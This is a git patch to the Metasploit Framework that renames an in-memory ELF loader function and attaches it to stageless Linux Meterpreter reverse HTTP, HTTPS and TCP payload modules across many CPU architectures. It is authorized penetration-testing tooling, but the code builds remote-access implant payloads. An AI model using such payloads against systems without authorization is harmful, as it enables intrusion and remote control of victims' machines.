From 0cc080fbe9cfa89af3bc87bd12cbe108d1c625f5 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Fri, 14 Feb 2025 05:42:14 -0500 Subject: [PATCH] fix: updated mettle payload generation and cached_size --- .../linux/aarch64/meterpreter_loader.rb | 2 +- .../payload/linux/armbe/meterpreter_loader.rb | 2 +- .../payload/linux/armle/meterpreter_loader.rb | 2 +- .../payload/linux/ppc/meterpreter_loader.rb | 2 +- .../linux/ppc64le/meterpreter_loader.rb | 2 +- .../linux/ppce500v2/meterpreter_loader.rb | 2 +- .../linux/aarch64/meterpreter_reverse_http.rb | 6 +++-- .../aarch64/meterpreter_reverse_https.rb | 6 +++-- .../linux/aarch64/meterpreter_reverse_tcp.rb | 22 ++++++++++--------- .../linux/armbe/meterpreter_reverse_http.rb | 7 ++++-- .../linux/armbe/meterpreter_reverse_https.rb | 6 +++-- .../linux/armbe/meterpreter_reverse_tcp.rb | 22 ++++++++++--------- .../linux/armle/meterpreter_reverse_http.rb | 6 +++-- .../linux/armle/meterpreter_reverse_https.rb | 7 ++++-- .../linux/armle/meterpreter_reverse_tcp.rb | 21 +++++++++--------- .../linux/mips64/meterpreter_reverse_http.rb | 6 +++-- .../linux/mips64/meterpreter_reverse_https.rb | 7 ++++-- .../linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsbe/meterpreter_reverse_http.rb | 6 +++-- .../linux/mipsbe/meterpreter_reverse_https.rb | 6 +++-- .../linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../linux/mipsle/meterpreter_reverse_http.rb | 6 +++-- .../linux/mipsle/meterpreter_reverse_https.rb | 6 +++-- .../linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../linux/x64/meterpreter_reverse_http.rb | 6 +++-- .../linux/x64/meterpreter_reverse_https.rb | 6 +++-- .../linux/x64/meterpreter_reverse_tcp.rb | 3 ++- .../linux/x86/meterpreter_reverse_http.rb | 6 +++-- .../linux/x86/meterpreter_reverse_https.rb | 6 +++-- .../linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../linux/zarch/meterpreter_reverse_http.rb | 6 +++-- .../linux/zarch/meterpreter_reverse_https.rb | 6 +++-- .../linux/zarch/meterpreter_reverse_tcp.rb | 21 +++++++++--------- tools/modules/meterpreter_reverse.erb | 4 +++- 34 files changed, 136 insertions(+), 88 deletions(-) diff --git a/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb b/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb index 3f76f524f7..2e99a95816 100644 --- a/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/aarch64/meterpreter_loader.rb @@ -5,7 +5,7 @@ # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html # module Msf::Payload::Linux::Aarch64::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x0a0080d2, # 0x1000: mov x10, #0 0x0a0080d2 0xea0300f9, # 0x1004: str x10, [sp] 0xea0300f9 diff --git a/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb b/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb index d1d160f7a8..e573ff1445 100644 --- a/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/armbe/meterpreter_loader.rb @@ -6,7 +6,7 @@ # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html # module Msf::Payload::Linux::Armbe::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x0020a0e3, # 0x1000: mov r2, #0 0x0020a0e3 0x04202de5, # 0x1004: str r2, [sp, #-4]! 0x04202de5 diff --git a/lib/msf/core/payload/linux/armle/meterpreter_loader.rb b/lib/msf/core/payload/linux/armle/meterpreter_loader.rb index 59f84bfaee..c3c3039405 100644 --- a/lib/msf/core/payload/linux/armle/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/armle/meterpreter_loader.rb @@ -5,7 +5,7 @@ # Resource and Credits: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html # module Msf::Payload::Linux::Armle::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0xe3a02000, #0x1000: mov r2, #0 0xe3a02000 0xe52d2004, #0x1004: str r2, [sp, #-4]! 0xe52d2004 diff --git a/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb index a8b1d99aa0..a24db4cbdb 100644 --- a/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/ppc/meterpreter_loader.rb @@ -6,7 +6,7 @@ # module Msf::Payload::Linux::Ppc::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x48000084, # 0x1000: b 0x1084 0x48000084 diff --git a/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb index d1e82cf2b1..02e0b3674b 100644 --- a/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/ppc64le/meterpreter_loader.rb @@ -6,7 +6,7 @@ # module Msf::Payload::Linux::Ppc64le::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x4800007c, # 0x1000: b 0x107c 0x4800007c 0x7de802a6, # 0x1004: mflr r15 0x7de802a6 diff --git a/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb b/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb index e3fd8c8cb1..8a1aa92fd9 100644 --- a/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb +++ b/lib/msf/core/payload/linux/ppce500v2/meterpreter_loader.rb @@ -7,7 +7,7 @@ module Msf::Payload::Linux::Ppce500v2::MeterpreterLoader - def in_memory_loader(payload) + def in_memory_load(payload) in_memory_loader = [ 0x48000084, # 0x1000: b 0x1084 0x48000084 0x7de802a6, # 0x1004: mflr r15 0x7de802a6 diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 8fc69c37be..04de100496 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Aarch64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index 573b88819f..e8e9785537 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Aarch64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 847bddcf0c..b4c2d6abdf 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1184672 @@ -11,32 +12,33 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::Aarch64::MeterpreterLoader + def initialize(info = {}) super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_AARCH64, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index e0344f9817..7689263c82 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -7,9 +7,11 @@ module MetasploitModule CachedSize = 1106544 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +33,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index fd3b4e53ca..84db685980 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 11df66faec..8c69f00b0d 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1106544 @@ -11,32 +12,33 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::Armbe::MeterpreterLoader + def initialize(info = {}) super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMBE, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_armbe_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_ARMBE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_armbe_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('armv5b-linux-musleabi', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index f3c9774bed..3dc4c84145 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index 1af2703707..d4ca921d10 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -7,9 +7,11 @@ module MetasploitModule CachedSize = 1106844 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Armle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +33,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index d660a88236..1dc4d99db9 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -3,6 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## + # Module generated by tools/modules/generate_mettle_payloads.rb module MetasploitModule CachedSize = 1106844 @@ -16,28 +17,28 @@ module MetasploitModule super( update_info( info, - 'Name' => 'Linux Meterpreter, Reverse TCP Inline', - 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', - 'Author' => [ + 'Name' => 'Linux Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ 'Adam Cammack ', 'Brent Cook ', 'timwr' ], - 'Platform' => 'linux', - 'Arch' => ARCH_ARMLE, - 'License' => MSF_LICENSE, - 'Handler' => Msf::Handler::ReverseTcp, - 'Session' => Msf::Sessions::Meterpreter_armle_Linux + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_armle_Linux ) ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true }.merge(mettle_logging_config) payload = MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', generate_config(opts)).to_binary :exec - in_memory_loader(payload) + payload + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 39740373e3..30cf576aff 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mips64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index 43d965b7ab..6b86ea0ef2 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -7,9 +7,11 @@ module MetasploitModule CachedSize = 1685392 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mips64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +33,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips64-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 028af6ce61..14d681cd73 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index 4a5871ae8b..ef306ab382 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 7b9a4f340f..7cdf9b8ce2 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsbe::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mips-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 4fd14de3a0..f1df48487a 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index be0d4e92e9..414d350fa3 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index a825280770..444040f640 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Mipsle::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('mipsel-linux-muslsf', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 91a2063cb8..9888ed7134 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb index 0f13084748..404bc6509d 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb index 092137b4e3..89944b0e12 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X64::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('x86_64-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb index cb4f2155df..c646651a74 100644 --- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb @@ -11,6 +11,7 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig include Msf::Payload::Linux::X64::MeterpreterLoader + def initialize(info = {}) super( update_info( @@ -31,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb index f00fc17bae..b140c6afee 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X86::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb index ca981dbf70..333695cf69 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::X86::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'https', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('i486-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb index 05378c8201..7ca088eab3 100644 --- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb @@ -32,7 +32,7 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'tcp', stageless: true diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb index cd64973d09..8d6eda6b7c 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Zarch::MeterpreterLoader def initialize(info = {}) super( @@ -31,11 +32,12 @@ module MetasploitModule ) end - def generate(_opts = {}) + def generate opts = { scheme: 'http', stageless: true }.merge(mettle_logging_config) - MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + payload = MetasploitPayloads::Mettle.new('s390x-linux-musl', generate_config(opts)).to_binary :exec + in_memory_load(payload) + payload end end diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb index 9353c46bc9..fbdf407935 100644 --- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb @@ -10,6 +10,7 @@ module MetasploitModule include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions::Linux include Msf::Sessions::MettleConfig + include Msf::Payload::Linux::Zarch::MeterpreterLoader def 